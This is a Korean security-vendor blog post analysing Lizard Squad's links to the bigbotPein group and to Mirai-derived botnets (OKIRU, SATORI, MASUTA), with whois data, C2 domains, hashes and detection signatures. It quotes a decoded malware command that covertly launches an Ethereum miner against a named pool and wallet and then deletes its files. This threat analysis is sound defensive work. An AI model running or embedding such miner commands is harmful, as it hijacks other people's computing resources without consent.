Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
보안 동향최신 Mirai 개발자와 연관된 해킹그룹 Lizard Squard 캠패인 분석
작성일 2018-02-12 조회 1950

https://www.engadget.com/2017/12/22/lizard-squad-hacker-founder-guilty/

 

 

 

Lizard Squad black hat hacking group 필모그라미

- 2014 년 소셜 PLAYSTATION Network1과 Microsoft의 Xbox Live2를 DDoS (분산 서비스 거부) 공격으로 중단 의혹
- 2015 년 1 월, Lizard Squad는 Malaysia Airlines 웹 사이트에 "ISIS will prevail"이라는 메세지로 웹서버 디페이스 공격 감행 
- FBI는 2016 년 10 월 5 일에 "@fbiarelosers", "@pein", "@xotehpoodle"및 "@lizard" 로 불리는 그룹의 창립 멤버 American Zachary Buchta를 검거
- FBI는 2016 년 10 월 Buchta 검거 이후 Mirai IoT Botnet 소스코드 일반에 공개하는데 체포에 대한 보복성 행위로 판단

 

[그림 1.] Lizard Squad그룹의 TimeLine

 

 


Lizard Squad black hat hacking group과 Mirai유포 단체의 연관성

► Lizard Squad 창립자 인 Zachary Buchta가 체포 된 지 9 일 후, Mirai의 소스 코드가 공개
► 우크라이나 호스팅 제공 업체 Blazingfast (Mirai의 저자가 사용)도 bigbotPein 그룹에서 사용되며 Lizard Squad와 연결
► 미라이 (Mirai)의 저자가 Brian Krebs 웹 사이트에 대규모 DDoS 공격
► fucklevel3 [.] wang에서 호스팅되는 Lizard Squad 웹 사이트의 Mirai에 대한 참고 자료
► 2017 년 2 월, x86 아키텍처 용 Mirai를 기반으로 한 Lizard Squad 맬웨어의 첫 번째 버전이 다음과 같은 호스트에 연결

krebs [.] fucklevel3 [.] wang
rdp [.] fucklevel3 [.] wang

► 2017 년 초  웹 사이트 krebs [.] fucklevel3 [.] wang은 처음으로 "BIGBOTPEIN"이라는 이름을 표시

► BIGBOTPEIN은 또한 Mirai Botnet과 @Pein (Lizard Squad의 설립자)에 대한 지원을 하고 SNS를 통해 Lizard Squard를 비난한 저널리스트 Brian Krebs에 대한 공격적인 커멘트를 게시
► 우연히도 Krebs의 웹 사이트는 2016 년 말에 가장 큰 DDoS 공격
► fucklevel3 [.] wang사이트의 whois 정보를 분석 한 결과 도메인 이름은 "miraigains"라는 조직 이름과 lolsec@420blaze.it에 연결된 등록자 이메일을 사용하여 악성 코드가 출시 된 날짜와 동일한 2017 년 2 월 도메인의 생성 날짜

Domain Name: fucklevel3.wang
Registrar URL: http://www.now.cn
Updated Date: 2017-02-15T06:09:06Z
Creation Date: 2017-02-04T03:35:32Z
Registry Expiry Date: 2018-02-04T03:35:32Z
Registrar: Todaynic com Inc
Registry Registrant ID: C20170204C_14720411-wang
Registrant Name: Scott Nieto
Registrant Organization: miraigains Registrant Street: 3433 Pike Street
Registrant City: San Diego Registrant State/Province: JL Registrant Postal Code: 92111
Registrant Country: US
Registrant Phone: +1.6197524681 Registrant Phone Ext: Registrant Fax: +1.6197524681 Registrant Fax
Ext: Registrant Email: lolsec@420blaze.it

► 하드 코드 된 암호를 포함한 호스트 및 기타 정보는 Mirai의 기본 XOR 기반 스키마 (table_unlock_val () function7)로 인코딩.
► 직후에 ARM, PowerPC 및 MIPS 아키텍처를 지원하는 추가 변형
12.2017 년 초, 새로운 봇넷 그룹이 발견되었는데, 체포 된 후 Lizard Squad black hat hacking group Buzza를 지지하는 bigbotPein이라고 밝힘, 이 그룹은 Mirai IoT Botnet을 통합하여 현재 x86, x64, ARM, MIPS, SuperH, SPARC 및 ARC와 같은 여러 아키텍처를 지원, 이 그룹에 고유 한 점은 Ethereum 및 Monero 마이너와 함께 악성 프로그램의 복잡성이 증가

[그림 2.] Website at www[.]mail[.]bigbotpein[.]com (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)


► 2017년 10월 발견된 Mirai 기반 멀웨어 캠페인은 bigbotpein [.] com 도메인을 사용중
► fucklevel3[.]wang의 whois 기록 정보를 분석하면 도메인의 동일한 등록자(lolsec@420blaze.it)가 나타남
► Botnet 제어 서버에 Mirai의 각기 다른 8개의 C2서버가 우크라이나 호스팅 제공 업체 인 blazingfast [io]에 존재함

 

 

 

OKIRU Campaign

[그림 3.] Okiru 악성코드 Strings (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

 

► 2017년 10월 발생한 해당 캠페인은 Mirai의 Default XOR 키를 변경
► Decrypt한 문자열은 다음과 같습니다.

- Group Name: bigbotPein
- Campaign: OKIRU
- Malicious Domains: control[.]almahosting[.]ru and network[.]bigbotpein[.]com

 

 

 

SATORI Campaign

[그림 4.] Satori 악성코드 Strings (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

 

► 2 개월 후인 2017 년 12 월 18 일, OKIRU Campaign에서 사용된 동일한 XOR 키를 사용한  bigbotPein의 악성코드가 발견
► SATORI는 ARM 및 MIPS 아키텍처를 지원하고 새로운 악성 도메인을 추가(c[.]everydayischristmas[.]ml)
► 호스팅을 바꿔가며 network[.]bigbotpein[.]com을 유지하던 그룹은 2018년 초 미국의 ISP에서 호스팅을 지속하는것이 발견

[그림 5.] bigbotpein.com_IPS table (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

 

► 2018 년 1 월 14 일에 (그림 9)와 같이 Lizard Squad 및 bigbotPein 멀웨어와 관련된 모든 도메인이 동일한 미국 기반 ISP
► 모든 도메인이 확실히 연결되어있어 LizardSquard와 bigbotPein이 동일한 그룹의 일부임을 확인

[그림 6.] All malicious domains pointing to the same location (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

 

 


Lizard Squad link to MASUTA & MEMES variants
► 2017 년 2 월, 대량의 미라이 변종에서 다음과 같은 특징이 발견

- 문자열 "/ bin / busybox MASUTA"
- x86, ARM 및 MIPS 아키텍처 지원
- Mirai가 구현 한 기본 XOR 기반 인코딩 체계 사용

[그림 7.] Masuta Strings (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)


► "GOSH THAT ... ATE A LOT"라는 서명이 처음으로 보였습니다.
► 또한 사용된 도메인

- friend.dancewithme[.]gq
- friend2.dancewithme[.]gq

은 Whois 검색 결과 Organisation이 Equatorial Guinea Domains B.V로 SATORI의 최신 버전에서 사용 된 것과 동일 합니다.

Domain name:
DANCEWITHME.GQ
Organisation:
Equatorial Guinea Domains B.V. Dominio GQ administrator
P.O. Box 11774 1001 GT Amsterdam Netherlands
Phone: +31 20 5315725
Fax: +31 20 5315721
E-mail: abuse: abuse@freenom.com
Domain Nameservers: NS01.FREENOM.COM NS02.FREENOM.COM NS03.FREENOM.COM NS04.FREENOM.COM

► 또 다른 미라이 변종인 MEME[ec426d85426f3dddbc5fc7ca0ee22f3d (PowerPC)]는 인코딩되지 않은 문자열을 분석한 결과 "MASUTA"문자열이 "MEME"로 대체되었고 "GOSH THAT ... ATE A LOT"서명이 포함 된 것을 볼 수 있습니다.

► 코드와 서명의 유사성으로 인해 MASUTA와 MEME가 같은 위협 요소에 속한 것으로 의심

 

 

 

Connection of bigbotPein with MASUTA/MEMES

[그림 8.] Second Stage Execution (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

 

► 2017 년 7월 Mirai 샘플 분석결과 맬웨어가 셸 코드로 점프하기 전에 캐시 데이터와 명령이 주 메모리와 동기화되도록하기 위해 메모리의 두 번째 스테이지 페이로드 (일부 버전은 UPX 패커 사용)를 숨기고 디코딩하고 cacheflush 함수를 여러 번 호출 할 수있게합니다.
MIPS 및 ARM 아키텍처에서 볼 수있는 일반적인 프로세스 인 가비지 명령어 실행을 피할 수 있습니다.
실행 결과를 그림 8에서 볼 수 있습니다. 맬웨어가 페이로드를 새 메모리 섹션에 쓸 때마다 주 메모리와의 동기화를 위해 cacheflush ()를 호출합니다.
두 번째 단계의 페이로드로 이동하기 직전에 멀웨어는 munmap을 호출하여 지정된 주소 범위 (이 경우 주요 맬웨어 프로세스)에 대한 매핑을 삭제하여 해당 섹션을 무효로 만듭니다.
이렇게하면 멀웨어가 메모리에 숨어있게됩니다. 멀웨어가 메모리에서 완전히 디코드되면 Mirai가 "unlink"명령을 실행하여 디스크에서 바이너리를 삭제하는 첫 번째 명령을 볼 수 있습니다.

 

[그림 9.] Connecting groups via code similarity (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

► 그림 9는 방금 설명한 로직을 어셈블리 (MIPS)로 보여줍니다.
위쪽 다이어그램은 위에서 언급 한 Ethereum dropper 변형이며 아래쪽 다이어그램은 비슷한 코드로 발견 된 다른 샘플을 보여줍니다. 할당 할 메모리는 두 샘플 모두 동일
► bb1e00e9bef8cb20f552fbc0766655a1 변종은 마침내 MASUTA와 MEMES 변종에서 볼 수 있듯이 알려진 서명 "GOSH THAT ... ATE A LOT"를 출력

 

 

 

Monero Stratum by OKIRU
► 2017 년 11 월 OKIRU 캠페인에서 bigbotPein그룹의 도메인에서 control[.]almahosting[.]ru cryptonite.mips라는 악성파일을 유포
► 유포 당시 VT에 탐지 건수는 0건인 이유


 [그림 10.] cryptonite.mips Zero Detection (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

 

- 멀웨어는 실행하기 위해 세 가지 인수가 필요 그렇지 않으면 즉시 종료
   첫 번째 인수는 C&C IP의 활성화 여부
   두 번째 인수는 대상 포트이며
   세 번째 인수는 Miner Bot과 관련된 할당 numeric ID
   해당 악성코드 Monero Stratum(a70a96f64a266f0f59e4f67c4a92f24fe8237c1349f377fd2720c9e1f2970400)는 공격자에게 유용한 유용한 익명 성을 제공하기 때문에 최근 주목을 받았습니다.

 

► 그림 11은 예상 해시 테스트 시나리오를 보여줍니다.

 [그림 11.] stratum monero hash test (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

Miner가 실행되면 제공된 IP 및 포트에 88바이트 Initial Connection을 무한 시도합니다. 수신 된 명령은 XOR 키 0x42로 디코딩됩니다. 전달받는 커멘드는 Miner Porcess Kill로 중지 명령과 같은 마이너의 프로세스 관련 명령어입니다.

 

 


Ethereum by SATORI
► 1월 8일, SATORI의 새 변종이 발견
► 이전 버전과 동일한 수정된 XOR 인코딩을 사용
► 난독화 레이어가 추가
► 메모리의 디코딩 된 문자열은 그림 16에서 볼 수 있습니다.
► 이번 변종에서는 이전 변종에서는 보지 못했던 새로운 도메인이 발견되었으나 MASUTA 변종에서 발견된 "Equatorial Guinea Domains B.V." Organisation이었습니다.

Domain name:
SUNNYJULY.GQ
Organisation:
Equatorial Guinea Domains
B.V. Dominio GQ administrator
P.O. Box 11774 1001 GT Amsterdam Netherlands
Phone: +31 20 5315725
Fax: +31 20 5315721
E-mail: abuse: abuse@freenom.com
Domain Nameservers:
NS01.FREENOM.COM NS02.FREENOM.COM NS03.FREENOM.COM NS04.FREENOM.COM

 

► 디코딩 된 문자열은 Windows 용 Ethereum 마이너와 같은 형태를 띄고 있습니다.
아래의 json에있는 16 진수 값은 Decoding 결과 Miner 호출에 사용

{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","7374617274202f42 202222204574684463724d696e657236342e657865202d65706f6f6c206574682d7573322e647761726670
6f6f6c2e636f6d3a38303038202d6577616c20307842313541353333326542376344324444376134456337
663936373439453736394133373135373264202d6d6f64652031202d6d706f72742033333333202d6d7073
7720456870535648745562740d0a64656c202f46202f51204574684463724d696e657236342e6578650d0a
64656c202f46202f5120636f6e6669672e7478740d0a64656c202f46202f51207265626f6f742e626174"]
}
Decoded version of the hexadecimal values:
start /B "" EthDcrMiner64.exe -epool eth-us2.dwarfpool.com:8008 -ewal 0xB15A5332eB7cD2DD7a4Ec7f96749E769A371572d -mode 1 -mport 3333 -mpsw EhpSVHtUbt del /F /Q EthDcrMiner64.exe
del /F /Q config.txt del /F /Q reboot.ba
t

 

► 마이너는 Windows OS에 구동하는 호출 구문을 가졌지만, 초기에는 MIPS IoT형 마이너를 대상으로 했으며, 이후 변종된것으로 판단, 디코딩된 문자열에 이더리움 지갑 주소를 확인(0xB15A5332eB7cD2DD7a4Ec7f96749E769A371572d)

[그림 12.] Ethereum Payouts (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)

 

► 공격 그룹은 7일 안에 2.024296ETH 또는 약 2165USD의 총 2 회 환전
지난 24 시간 동안 거래를 보면 시간당 환전액이 증가하는 것을 볼 수 있는데 이는 이 기간에 봇이 매우 활동적이었다고 볼수 있습니다.

[그림 13.] Share submissions for past 24 hours (https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf)


► 우연히도, 재커리 부처 (Zachary Buchta)는 최근에 2017 년 12 월에 유죄를 인정했습니다. (그림 https://www.engadget.com/2017/12/22/lizard-squad-hacker-founder-guilty/ 참조)
Ethereum 마이닝을 통해 조성된 기금과 Buchta에 부과된 350,000 달러 벌금간에 상관 관계가 있을 수 있습니다

 

 

 

샘플정보

[Okiru Miner]
98b05f4bcf4fb9488dd0d38d5559e5ee5d32f924de79a4db48e1ed2b25be761a - MIPS
[Satori Miner]
c89113f7615d373fdc1a9a0b8b295fdd0de2c5ce76fc779ccee9f3488ceedb95 - MIPS
[Okiru]
e261e9cdfe31d98f4486c6dc6260dc02f2c4bd87c2cda6d4db9b459cda8f96af - MIPS
c55f7869b34bd826dd3c3af2c8751622b0aede993477476698bafb9d498fb5f7 - ARM
7f991084ca8256a6fea8b2270a2254237de23bc1fd1aa4ba67c976ad1dc5bad0 - MIPS
53b009943957e969219f578bac234f46bf91ca6d3d227d40dac0b4b0cbb39b89 - ARM
44cf18689ff08784ea6122211fba1e6f654f268b2c226c57cd640d7dcaad55bd - x64
fa2b9d425d41070e921fbc92811d3e9a2b9411c958bc48ee7a5240dad73130d2 -x86

 

 

 

Sniper 제품군 대응 방안

[Sniper-IPS]

[4082] Linux/Miner.Satori.19904
[4083] Linux/Miner.Satori.19904.A
[4084] Linux/Miner.Satori.19904.B
[4085] Linux/Miner.Okiru.1529
[4086] Linux/Miner.Okiru.1529.A

[Sniper-UTM]

[838861400] Linux/Miner.Satori.19904
[838861401] Linux/Miner.Okiru.1529
[838861402] Linux/Miner.Okiru.1529.A

[Sniper-APTX]

[3313] Linux/Miner.Satori.19904
[3314] Linux/Miner.Satori.19904.A
[3315] Linux/Miner.Satori.19904.B
[3316] Linux/Miner.Okiru.1529
[3317] Linux/Miner.Okiru.1529.A

 

 

 

참조 페이지

https://www.zingbox.com/wp-content/uploads/2018/01/Lizard-Squad-White-Paper-v7.pdf
https://github.com/sammy007/monero-stratum

첨부파일 첨부파일이 없습니다.
태그   Okiru  Lizard Squad  bigbotPein